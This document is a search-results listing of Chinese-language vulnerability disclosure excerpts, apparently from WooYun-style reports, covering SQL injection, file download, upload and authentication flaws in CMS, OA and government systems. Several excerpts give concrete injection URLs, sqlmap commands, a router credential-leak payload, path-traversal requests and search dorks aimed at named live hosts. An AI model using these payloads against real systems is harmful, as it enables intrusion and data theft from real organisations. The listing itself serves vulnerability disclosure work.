56796 matches found
KC-Wiki 1.0 /minimal/wiki.php 任意文件下载漏洞
No description provided by source...
通达oa2013集团版注入3处
简要描述: 通达 详细说明: 官网demo登录: http://www.day900.com/ cw登陆比较鸡肋 漏洞证明: 注入1+payload: http://www.day900.com/general/budget/budgetprocess/budgetprojectdepts.php?DEPTID=1&DEPTIDPRIV=0&DEPTIDS=1...
Ruijie Router NBR 信息泄漏漏洞
使用ModifyHeaders修改Cookie头为:auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;使用Hackbar发送POST包到:http://localhost/WEBVMS/LEVEL15/内容为:command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. 得到admin的帐号密码。 !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req fr...
某行政服务系统一处sql注入漏洞
简要描述: rt 详细说明: 某行政服务系统一处sql注入漏洞。 谷歌搜索:技术支持:邯郸市连邦软件发展有限公司 inurl:list.aspx?columntag= 案例如下: http://www.jzxdzjc.gov.cn/portal/dzjc/jsjy/list.aspx?columnTag=%27zcfg%27 http://119.178.103.6:81/portal/dzjc/jsjy/list.aspx?columnTag='tzgg'...
DedeCms 5.6 /plus/carbuyaction.php 本地文件包含漏洞
No description provided by source...
phpems 多处sql注射
简要描述: phpems 多处sql注射 详细说明: 百度搜索: title:PHPEMS无纸化模拟考试系统 ev.cls.php: public function getClientIp if!isset$this-e'ip' if getenv"HTTPCLIENTIP" && strcasecmpgetenv"HTTPCLIENTIP", "unknown" $ip = getenv"HTTPCLIENTIP"; else if getenv"HTTPXFORWARDEDFOR" && strcasecmpgetenv"HTTPXFORWARDEDFOR", "unknown" $...
某高校在用系统SQL注入(DBA)(无需登录)2-5
简要描述: ·· 详细说明: WooYun: 某高校在用系统sql注入(打包)(DBA)(无需登录)2 上一发 注入文件参数:language.asp editLangCode 案例 202.195.243.37/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.120.121.200/tasi/admin/system/language.asp --data...
某高校在用系统sql注入(DBA)(无需登录)
简要描述: 详细说明: WooYun: 某高校在用系统sql注入(打包)(DBA)(无需登录)2 上一个 注入文件fileformat.asp 参数txtFormatName 案例 202.195.243.37/tasi/admin/system/fileformat.asp --data "txtFormatName=sss&txtFormatExt=sss&txtFormatVersion=sss&cboFileType=1&formatid=0&action=add&btnSaveFormat=%B1%A3%B4%E6" -p txtFormatName...
某教学系统存在注入漏洞
简要描述: RT 详细说明: SQL注入地址: /anmai/KYMamage/IntegrateSelect/OutlayEarningSelectparticular.aspx SQL注入案例: http://218.78.241.80/anmai/KYMamage/IntegrateSelect/OutlayEarningSelectparticular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KYMamage/IntegrateSelect/OutlayEarningSelectparticular.aspx?id=1...
上海安脉教学系统存在注入漏洞
简要描述: RT 详细说明: SQL注入文件: /anmai/KYMamage/IntegrateSelect/OutlayPayoutSelectparticular.aspx SQL注入案例: http://218.78.241.80/anmai/KYMamage/IntegrateSelect/OutlayPayoutSelectparticular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KYMamage/IntegrateSelect/OutlayPayoutSelectparticular.aspx?id=1...
嘉挚科技短信通sql注入
简要描述: rt 详细说明: http://sms.finereason.com/ 首先注册一个用户,登陆。然后在 http://sms.finereason.com/member/ComSms.asp?tid=1 存在在注入。用burp抓包,然后保存。 GET /member/ComSms.asp?tid=1 HTTP/1.1 Host: sms.finereason.com Proxy-Connection: keep-alive Accept:...
上海安脉教育管理系统存在注入漏洞
简要描述: RT 详细说明: SQL注入文件 /anmai/KYMamage/IntegrateSelect/PatentProductionparticular.aspx SQL注入案例: http://218.78.241.80/anmai/KYMamage/IntegrateSelect/PatentProductionparticular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KYMamage/IntegrateSelect/PatentProductionparticular.aspx?id=1...
某通用型行政大厅服务系统SQL注射
简要描述: 某通用型行政大厅服务系统SQL注射 详细说明: 某通用型行政大厅服务系统SQL注射。 关键字搜索: 技术支持:邯郸市连邦软件发展有限公司 inurl:newsinfo.aspx?columntitle= 案例: http://121.30.251.3:85/portal/xzsp3/newsinfo.aspx?columntitle=%E4%B8%AD%E5%BF%83%E7%AE%80%E4%BB%8B...
对北京致远协创软件有限公司官方网站的一次渗透性测试
简要描述: 能不能积极确认漏洞,别总忽略!还能不能玩耍了!O∩∩O哈哈 详细说明: 由任意文件下载到读取数据库配置文件 查看伪静态文件 http://www.seeyon.com/.htaccess phpinfo http://www.seeyon.com/phpinfo.php 物理路径泄露 http://www.seeyon.com/inc/db.php 漏洞证明: 任意文件下载读取数据库配置文件 http://www.seeyon.com/downfile.php?file=/../inc/conn.php seeyon用户允许远程连接,利用navicat链接,成功控制数据库...
MallMold 2.5 app/action/cartAction.php SQL注入漏洞
No description provided by source...
PHPDisk F-Core V1.1 profile.inc.php SQL注入漏洞
No description provided by source...
MallMold 2.5 app/action/accountAction.php SQL注入漏洞
No description provided by source...
AnyMacro安宁邮件系统前台SQL注入漏洞可直接读库
简要描述: AnyMacro安宁邮件系统前台注入 应该没有重复 不知道有没有两个$$ 顺便rank也多给点呗 详细说明: anymacro是国内较流行的一家企业级邮箱系统,客户主要为教育/政府机构。漏洞影响范围参考以前的漏洞,就不一一贴出来了 漏洞文件: /reg.php 参数: Fdomain 数据库: MYSQL sqlmap: --dbms mysql -p Fdomain 漏洞证明: 1、 mail.imnc.edu.cn/reg.php POST /reg.php HTTP/1.1 Host: mail.imnc.edu.cn User-Agent: Mozilla/5.0...
MallMold 2.5 app/action/newsletterAction.php SQL注入漏洞
/app/action/newsletterAction.phppublic function statistics //create a image header'Content-type:image/gif'; echo base64decode'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='; $sn = trim$GET'sn'; $email = trim$GET'ue'; $this-model'newsletter'-statistics$sn, $email;...
Mao10CMS V3.1.0 SQL注入
简要描述: Mao10CMS V3.1.0 SQL注入 详细说明: Application\User\Controller\LostpassController.class.php 第13行 $pageid = M'meta'-where"metakey='useremail' AND metavalue='".I'param.useremail'."' AND type='user'"-getField'pageid'; 这里的I'param.useremail' 直接从GET插入,没有经过过滤。 把ThinkPHP执行的sql语句输出,输入单引号测试一下 测试payload...
JettyWebServer 9.2.3-9.2.8 shared-buffer 信息泄露漏洞
No description provided by source...
致远软件某网站漏洞合集
简要描述: 致远软件某网站漏洞合集,能不能给20rank 详细说明: 致远软件自助服务网站 问题如下: SQL注入 问吧管理员弱口令 任意文件上传 漏洞证明: SQL注入证明------------开始 注入点为 http://support.seeyon.com/ask/base/QuestionHandler.ashx?callback=jsonp1428044230217&mode=list&title=ceshi 注入类型 获取数据库列表 SQL注入证明------------结束 问吧管理员弱口令证明------------开始 后台地址...
B2Bbuilder 7.0.1 /main.php SQL注入漏洞
No description provided by source...
PHPSHE SQL注入
简要描述: 又SQL注入了。 详细说明: WooYun: PHPSHE SQL注入 来看看这个去年的漏洞修复的怎么样了- - peselect'order', array'orderid'=$void; if $info'orderstate' == 'notpay' $order'orderoutid' = $vpmode; $order'orderpayway' = 'ebank'; $order'orderstate' = 'paid'; $order'orderptime' = time; $db-peupdate'order', array'orderid'=$void,...
mcms最新版SQL注入二枚打包(可出任意数据)
简要描述: mcms最新版SQL注入二枚打包(可出任意数据) 详细说明: 前段时间在wooyun提交了几个mcms的漏洞,以前mcms的版本是v3.1.1.enterprise, WooYun: mcms最新版SQL注入三枚打包(可出任意数据) ,现在都升级到v3.1.3.enterprise了,还是来研究一下mcmsv3.1.3.enterprise吧。 注入一枚:POST...
hdwiki v5.1 /control/edition.php SQL注入漏洞
No description provided by source...
Qianwei Music 3.5 /source/admincp/include/function.php 登录绕过漏洞
No description provided by source...
phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历)
简要描述: phpyun人才系2015-02-03Sql注入2枚可删除任意简历 无法绕过waf,也就获取不了敏感信息。 详细说明: 代码 /wap/member/model/index.class.php function addresumeaction//复制的较长,可直接略过。 if$this-config'userenforceidentitycert'=="1" $row=$this-obj-DBselectonce"resume","idcardpic'' and uid='".$this-uid."'"; if$row'idcardstatus'!="1"...
Qianwei Music 3.5 /source/plugin/player/player.php SQL注入漏洞
/source/connect/callback.phpclosebrowse; $CDID=SafeRequest"id","get"; global $db; $sql="select from ".tname'music'." where CDID=".$CDID; if$row=$db-getrow$sql if$row'CDServer'0 $server=$db-getrow"select from ".tname'server'." where CDID=".$row'CDServer'; $player=$server'CDUrl'.$row'CDUrl'; else...
Qianwei Music 3.5 /source/connect/callback.php SQL注入漏洞
No description provided by source...
某政府服务系统存在通用性两处任意文件上传可getshell
简要描述: 两处任意文件上传漏洞 详细说明: 技术支持:邯郸市连邦软件发展有限公司 波及多家政务服务系统,可直接上传获取webshell。【声明:未做任何破坏】 两处任意文件上传: 第一处: http://121.18.89.108/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.lxxzfwzx.com/workplate/comm/xzsp/form/aspxforms/fzlist.aspx...
使用webscan360的cms厂商通过hpp可使其失效(附cmseasy新版sql注射)
简要描述: 使用webscan360的cms厂商通过hpp使其失效(附cmseasy新版sql注射),思前想后,不知道这个漏洞到底该给360呢 还是给cmseasy 最终还是给了确认神速的cmseasy 详细说明: 默认安装cmseasy最新版本 webscancache.php: $webscanwhiteurl = array'index.php' = 'admindir=admin','index.php' = 'case=file','index.php' ='case=admin'; 然后再看 360webscan.php: if...
HDwiki 5.1 /model/pms.class.php SQL注入漏洞
No description provided by source...
JEECMS储存xss盲打后台#6(demo演示)
简要描述: xss 详细说明: WooYun: JEECMS储存xss盲打后台5 接着来 稳定压倒一切! Jeecms是基于java技术研发的站群管理系统,稳定、安全、高效、跨平台、无限扩展是jeecms 的优点,系统支持mysql、oracle、sqlserver、db2等主流数据库。 轻松建设大规模网站群,从jeecms开始 官网:http://www.jeecms.com/ demo地址:http://www.jeecms.com/demo.jhtml 这套cms有3种类别的,这里演示第三种商场系统...
大汉网络后台用户密码存储不安全
简要描述: 大汉网络后台用户密码存储不安全,影响信息公开内容系统和网站群系统 详细说明: 大汉爆出很多的漏洞,包括sql、任意文件下载、上传文件漏洞。 对于上传、下载这些越权的漏洞,大汉已经进行了修补,不过只是增加了对权限的判断,必须是登录成功的用户才能给进行上传下载操作,看似修补成功了。 不过现在大汉网站群在很多政府部门大量使用,即使存在sql注入。可能也还是一部分信息泄露,毕竟没有涉及到账号密码。 今天我曝的这个洞,乌云上还没有人提交过。 这是信息公开内容管理系统 这是jcms网站群,用户名和密码都是存储在同一张表中MERPPUBUSER...
强智教务系统,可以重置任意用户密码
简要描述: 可以重置任意用户密码 详细说明: WooYun: 某教务系统组合漏洞可直接重置任意用户密码 在@sdc1992 提交该漏洞之后,官方在身份证号的地方加了个判定,不能够为空,但是由于是js判定的,所以和没加一样 该问题发现于 http://xxjw.hnust.cn/xxjw/framework/enteraccount.jsp 漏洞证明: 添加了一个js判定 function toSub ifdocument.getElementById"sfzjh" var sfzjh = trimdocument.getElementById"sfzjh".value;...
精讯CMS SQL注入(通杀)
简要描述: 底层模型解析出错,导致大面积注入。 这是真的注入,真的能注出数据的。 无视新版添加的webscan.class.php 详细说明: 找注入,上来就看sql语句是怎么处理的。 jxcms的model调用数据库操作无论是 -where -find 都会调用/jxcms/lib/core/db.class.php文件中的checkOneWhere函数进行组装与过滤。 private function checkOneWhere$str $tmp = pregreplace'/"|'.?\1/s', '', $str; $tmp = strtoupper$tmp; if...
DamiCMS 2.2 /Web/Lib/Action/ApiAction.class.php SQL注入漏洞
/Web/Lib/Action/ApiAction.class.php$field =!empty$REQUEST'field'?injectcheck$REQUEST'field':''; $m=new Model$model,"",false; //如果使用了分页,缓存也不生效 if$page import"@.ORG.Page"; //这里改成你的Page类 $count=$m-where$where-count; $totalpage = ceil$count / $pagesize; $p = new Page$count,$pagesize; //如果使用了分页,num将不起...
TinyShop越权漏洞
简要描述: 测试版本:V1.3 匿名用户可越权看到部分在后台才能看到的内容,造成严重的信息泄露。 详细说明: 该套程序直接从URL中获取需要渲染的视图文件名,而未做合法性检查。导致匿名用户可以渲染后台视图文件,虽然不能对数据进行操作,但是会造成比较严重的敏感信息泄露。 漏洞证明: /framework/web/controller/controllerclass.php中渲染文件视图的相关代码 通过不断改变act的值,观察输出。 可以得出结论,act的值即视图文件名。那么,如果改成后台目录下的视图,会得到什么结果呢? 以官方演示站为例,输出了管理员用户名。...
用友致远A6协同办公系统存在一处DBA权限SQL注入漏洞
简要描述: RT 详细说明: 漏洞位于:/yyoa/checkWaitdo.jsp文件中 % uName = request.getParameter"userID";//接收参数 // System.out.printlnuName; if uName != "null" Connection con = ConnectionPoolBean.getConnection; //System.out.println"手动检查的结果中有问题的记录:"; boolean l = false; try uID = XiaoxsDbHelper.getIntcon, "select id fro...
用友致远A6协同系统SQL注射
简要描述: 用友致远A6协同系统SQL注射 详细说明: 这系统好像不属于用友软件了,使用量比较大,就转cert吧 /yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 sqlmap.py -u "http://oa.lzmc.edu.cn/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1" --dbms mysql 漏洞证明: sqlmap.py -u...
WordPress Aspose DOC Exporter Plugin 1.0任意文件上传漏洞
No description provided by source...
程氏舞曲 任意文件下载与设计缺陷
简要描述: 有利用条件!烦。 详细说明: 利用条件: 1、cms设置使用本机物理路径,就是上传文件存在本机服务器上。 2、后台关闭审核功能,或者通过审核。 条件1比较好达到,一般都在本机上。 条件2需要精心构造一下。 漏洞页面: user/music.php addsave函数用来上传歌曲的,这里提交数据包。...
DamiCMS v2.2 /index.php 代码执行漏洞
No description provided by source...
逐浪(Zoomla) x2.1/x2.0 /Common/FileService.aspx 任意文件上传漏洞
No description provided by source...
KPPW最新版本 绕过防护继续盲注
简要描述: KPPW2620150327UTF-8.zip 3月27 最新版本 详细说明: Url1: http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1 Url2: http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1 Url3:...
WordPress BePro Listings Plugin 2.1.995 /bepro_listings.php SQL注入漏洞
No description provided by source...
齐博CMS整站系统SQL注入
简要描述: 测试版本:V7.0 还是未初始化的问题。 详细说明: 发现$TBpre被遗漏了,该变量的作用是作为表的前缀,没有初始化,导致SQL注入。 /member/special.php中的相关代码 漏洞证明: 首先注册用户,创建专题,记下专题ID。然后便可以构造注入语句了。...
致远A8-V5存在任意用户密码修改漏洞
简要描述: 致远A8-V5存在两个漏洞 一是无视验证码撞库 二是任意用户密码修改 详细说明: 一是无视验证码撞库 致远A8-V5在设计时存在逻辑错误,用户修改密码时对原密码进行了验证,但是验证使用的服务存在未授权访问漏洞,系统对非合法请求的原密码验证功能进行回应,导致了无视验证码,无需login页面进行密码尝试 二是任意用户密码修改 致远A8-V5在设计时存在逻辑错误,在上一步对原始密码进行验证后,下一步不再检测原始密码,从而直接修改用户密码,导致平行权限的越权漏洞。 漏洞证明: 一是无视验证码撞库 POST穷举用户和密码代码如下 GET...
WordPress Marketplace Plugin 2.4.0 /modules/additional-preview-images.php 文件上传漏洞
No description provided by source...